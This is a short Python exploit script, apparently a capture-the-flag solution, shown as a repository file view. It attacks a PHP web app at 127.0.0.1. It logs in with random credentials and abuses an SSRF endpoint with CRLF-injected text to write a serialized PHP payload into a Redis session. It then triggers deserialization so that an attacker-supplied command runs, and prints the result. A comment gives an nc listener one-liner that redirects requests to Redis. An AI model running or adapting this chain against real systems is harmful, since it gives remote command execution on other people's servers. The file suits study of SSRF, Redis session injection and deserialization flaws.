/
exploit.py
45 lines (35 loc) 路 1.13 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import sys
import subprocess
import requests
import secrets
from urllib.parse import quote_plus
BASE_URL = 'http://127.0.0.1:10004'
if len(sys.argv) < 2:
print('Usage: {} <command>'.format(sys.argv[0]))
sys.exit(1)
command = sys.argv[1]
subprocess.call(['php', 'gen_serialized.php', command])
serialized = repr(open('sess_test', 'r').read())
serialized = serialized.replace('"', '\\"').replace("'", '"')
req = requests.Session()
# Login
req.post(BASE_URL+'/login.php', data={
'username': secrets.token_urlsafe(),
'password': secrets.token_urlsafe()
})
session_id = req.cookies['PHPSESSID']
print("[+] PHPSESSID =", session_id)
# SSRF to set session
exploit = (
"meow\r\n"
f"SET PHPREDIS_SESSION:{session_id} {serialized}\r\n"
"Host: meow\r\n"
)
req.post(BASE_URL+"/update.php?mode=url", data={
# while true ; do { echo -ne "HTTP/1.0 302 FOUND\r\nLocation: http://redis:6379\r\n\r\n" } | nc -lp 3000; done
"url": "http:/host:3000/aaa." + quote_plus(exploit)
})
# Deserialize & Execute command
res = req.get(BASE_URL).text
print("[+] Command executed:",
res[res.index("<br>")+4: res.index("<h2>Hello")].strip())